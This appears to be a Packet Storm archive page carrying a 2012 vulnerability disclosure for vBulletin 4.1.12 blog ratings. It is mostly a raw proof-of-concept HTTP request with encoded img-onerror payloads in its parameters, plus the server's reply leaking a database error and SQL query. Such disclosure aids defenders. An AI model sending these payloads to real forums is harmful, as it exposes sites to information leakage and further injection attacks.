exploit the possibilities

vBulletin 4.1.12 SQL Information Disclosure

vBulletin 4.1.12 SQL Information Disclosure
Posted Jun 8, 2012
Authored by HauntIT

vBulletin version 4.1.12 suffers from a MySQL information disclosure vulnerability.

tags | exploit, sql injection, info disclosure
MD5 | fd7539f362a0ea9730bc4e72aae66056

vBulletin 4.1.12 SQL Information Disclosure

Change Mirror Download
                                                                     



[ TITLE ....... ][ vBulletin 4.1.12 - sql information leak (for logged-in users)
[ DATE ........ ][ 03.05.2012
[ AUTOHR ...... ][ http://hauntit.blogspot.com
[ SOFT LINK ... ][ http://www.vbulletin.com
[ VERSION ..... ][ 4.1.12
[ TESTED ON ... ][ LAMP
[ ----------------------------------------------------------------------- [

[ 1. What is this?
[ 2. What is the type of vulnerability?
[ 3. Where is bug :)
[ 4. More...

[--------------------------------------------[
[ 1. What is this?
This is very nice CMS, You should try it! ;)

[--------------------------------------------[
[ 2. What is the type of vulnerability?


[--------------------------------------------[
[ 3. Where is bug :)

--- raw from burp ---
---raw-from-Burp---
POST /www/22o4/highz/las/blog.php?b=[%2fhtml][html]"%3e%3cimg%20src%3dx%20onerror%3d(1231234444444)%3b%3e[%2fhtml][%2fhtml][html]"%3e%3cimg%20src%3dx%20onerror%3d(1231234444444)%3b%3e[%2fhtml][%2fhtml][html]"%3e%3cimg%20src%3dx%20onerror%3d(1231234444444)%3b%3e[%2fhtml]&vote=[%2fhtml][html]"%3e%3cimg%20src%3dx%20onerror%3d(1231234444444)%3b%3e[%2fhtml][%2fhtml][html]"%3e%3cimg%20src%3dx%20onerror%3d(1231234444444)%3b%3e[%2fhtml][%2fhtml][html]"%3e%3cimg%20src%3dx%20onerror%3d(1231234444444)%3b%3e[%2fhtml] HTTP/1.1

Host: localhost

User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:12.0) Gecko/20100101 Firefox/12.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-us,en;q=0.5

Accept-Encoding: gzip, deflate

Proxy-Connection: keep-alive

X-Requested-With: XMLHttpRequest

Content-Type: application/x-www-form-urlencoded; charset=UTF-8

Referer: http://localhost/www/22o4/highz/las/entry.php?2-html-quot-gt-lt-img-src-xxx-onerror-alert(9999)-gt-html

Cookie: skimlinks_enabled=1; vbulletin_userlist_hide_avatars_buddylist=0; editor_height=cms_article%23207px; bb_lastvisit=1335789702; bb_lastactivity=0; bb_sessionhash=bcf4631bc0ea002087ded92c796ac79a; bb_userstyleid=1; bb_skipmobilestyle=0; bb_thread_lastview=7aeffb9e62242afd6746ab9c8bcb589269ddf416a-1-%7Bi-121_i-1335789759_%7D; bb_forum_view=0ca42d3e5b599ba0a771e794d5098040cf6497cba-3-%7Bi-3_i-1335862432_i-2_i-1336034464_i-1_i-1336034445_%7D; bb_calendar=e2e67b4d0ec6ed855d66d62b21910a6cf6af50d6a-3-%7Bs-7-.calyear._i-2012_s-8-.calmonth._i-5_s-8-.calview1._s-12-.displaymonth._%7D; bb_blog_lastview=47cf4ac63a62d3c29c6a536323fa891bc5b8cd46a-1-%7Bi-2_i-1336037033_%7D

Pragma: no-cache

Cache-Control: no-cache

Content-Length: 630

Connection: close



ajax=1&s=&securitytoken=1336037033-b3ba5f3786a6e5e260d2c6ccde476dd5bde7dc4d&vote=[%2fhtml][html]"%3e%3cimg%20src%3dx%20onerror%3d(1231234444444)%3b%3e[%2fhtml][%2fhtml][html]"%3e%3cimg%20src%3dx%20onerror%3d(1231234444444)%3b%3e[%2fhtml][%2fhtml][html]"%3e%3cimg%20src%3dx%20onerror%3d(1231234444444)%3b%3e[%2fhtml]&s=&securitytoken=1336037033-b3ba5f3786a6e5e260d2c6ccde476dd5bde7dc4d&do=rate&b=[%2fhtml][html]"%3e%3cimg%20src%3dx%20onerror%3d(1231234444444)%3b%3e[%2fhtml][%2fhtml][html]"%3e%3cimg%20src%3dx%20onerror%3d(1231234444444)%3b%3e[%2fhtml][%2fhtml][html]"%3e%3cimg%20src%3dx%20onerror%3d(1231234444444)%3b%3e[%2fhtml]&

---and-HTTP-answer---

HTTP/1.1 200 OK

Date: Thu, 03 May 2012 09:26:51 GMT

Server: Apache/2.2.17 (Ubuntu)

X-Powered-By: PHP/5.3.5-1ubuntu7.7

Vary: Accept-Encoding

Connection: close

Content-Type: text/xml; charset=windows-1252

X-Pad: avoid browser bug

Content-Length: 1650



<?xml version="1.0" encoding="windows-1252"?>
<errors>
<error><![CDATA[<p>Database Error</p>]]></error>
<error_html><![CDATA[<p>Database error in vBulletin 4.1.12 Beta 1</p>
<p>Invalid SQL:



REPLACE INTO blog_visitor

(userid, visitorid, dateline, day, visible)

VALUES

(

,

2,

1336037212,

1335909600,

1

);<p>
<p>
<strong>MySQL Error</strong> : You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '

2,

1336037212,

1335909600,

1

)' at line 5<br />
<strong>Error Number</strong> : 1064<br />
<strong>Request Date</strong> : Thursday, May 3rd 2012 @ 11:26:52 AM<br />
<strong>Error Date</strong> : Thursday, May 3rd 2012 @ 11:26:56 AM<br />
<strong>Script</strong> : http://localhost/www/22o4/highz/las/blog.php?b=[%2fhtml][html]"%3e%3cimg%20src%3dx%20onerror%3d(1231234444444)%3b%3e[%2fhtml][%2fhtml][html]"%3e%3cimg%20src%3dx%20onerror%3d(1231234444444)%3b%3e[%2fhtml][%2fhtml][html]"%3e%3cimg%20src%3dx%20onerror%3d(1231234444444)%3b%3e[%2fhtml]&vote=[%2fhtml][html]"%3e%3cimg%20src%3dx%20onerror%3d(1231234444444)%3b%3e[%2fhtml][%2fhtml][html]"%3e%3cimg%20src%3dx%20onerror%3d(1231234444444)%3b%3e[%2fhtml][%2fhtml][html]"%3e%3cimg%20src%3dx%20onerror%3d(1231234444444)%3b%3e[%2fhtml]<br />
<strong>Referrer</strong> : http://localhost/www/22o4/highz/las/entry.php?2-html-quot-gt-lt-img-src-xxx-onerror-alert(9999)-gt-html<br />
<strong>Classname</strong> : vB_Database<br />
<strong>MySQL Version</strong> : <br />
</p>]]></error_html>
</errors>


---raw-from-Burp---
---

Enjoy ;)
[--------------------------------------------[
[ 4. More...

- http://hauntit.blogspot.com
- http://www.google.com
- http://portswigger.net
[
[--------------------------------------------[
[ Questions? Mail me.
]
[ Cheers! o/
[

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

July 2019

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jul 1st
    34 Files
  • 2
    Jul 2nd
    15 Files
  • 3
    Jul 3rd
    9 Files
  • 4
    Jul 4th
    8 Files
  • 5
    Jul 5th
    2 Files
  • 6
    Jul 6th
    3 Files
  • 7
    Jul 7th
    1 Files
  • 8
    Jul 8th
    15 Files
  • 9
    Jul 9th
    15 Files
  • 10
    Jul 10th
    20 Files
  • 11
    Jul 11th
    17 Files
  • 12
    Jul 12th
    16 Files
  • 13
    Jul 13th
    2 Files
  • 14
    Jul 14th
    1 Files
  • 15
    Jul 15th
    20 Files
  • 16
    Jul 16th
    27 Files
  • 17
    Jul 17th
    7 Files
  • 18
    Jul 18th
    5 Files
  • 19
    Jul 19th
    0 Files
  • 20
    Jul 20th
    0 Files
  • 21
    Jul 21st
    0 Files
  • 22
    Jul 22nd
    0 Files
  • 23
    Jul 23rd
    0 Files
  • 24
    Jul 24th
    0 Files
  • 25
    Jul 25th
    0 Files
  • 26
    Jul 26th
    0 Files
  • 27
    Jul 27th
    0 Files
  • 28
    Jul 28th
    0 Files
  • 29
    Jul 29th
    0 Files
  • 30
    Jul 30th
    0 Files
  • 31
    Jul 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2019 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close